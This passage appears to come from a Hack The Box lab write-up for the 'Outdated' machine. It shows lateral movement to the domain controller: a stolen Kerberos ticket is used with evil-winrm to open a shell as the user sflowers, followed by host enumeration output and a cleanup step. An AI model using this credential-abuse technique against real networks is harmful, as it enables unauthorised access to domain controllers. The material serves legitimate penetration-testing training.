WinRM
Now that the sflowers user is [[Outdated_Shadow_Credentials#[Shadow Credentials](https //posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab)|fully compromised]], I can directly connect to the DC host by leveraging the group membership to the Remote Desktop Users
┌──(kali㉿kali)-[~/archive/htb/labs/outdated]
└─$ KRB5CCNAME=ShadowCredentials/sflowers@dc.outdated.htb.ccache evil-winrm -i dc.outdated.htb -r OUTDATED.HTB
Evil-WinRM shell v3.5
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\sflowers\Documents> whoami
outdated\sflowers
*evil-winrm* ps c:\Users\sflowers\Documents> hostname
DC
*evil-winrm* ps c:\Users\sflowers\Documents> ipconfig
Windows IP Configuration
ethernet adapter ethernet0 3:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::18e
ipv6 address. . . . . . . . . . . : dead:beef::f5bd:4446:16d5:72f5
link-local ipv6 address . . . . . : fe80::f5bd:4446:16d5:72f5%15
ipv4 address. . . . . . . . . . . : 10.10.11.175
subnet mask . . . . . . . . . . . : 255.255.254.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%15
10.10.10.2
ethernet adapter vethernet (vswitch):
connection-specific dns suffix . :
ipv4 address. . . . . . . . . . . : 172.16.20.1
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : 0.0.0.0Lateral Movement made and Initial Foothold established to the DC host, dc.outdated.htb, as the sflowers user via WinRM
cleanup
┌──(kali㉿kali)-[~/…/htb/labs/outdated/ShadowCredentials]
└─$ sudo rm /etc/krb5.confCleaning up the /etc/krb5.conf file, used for both BloodyAD and evil-winrm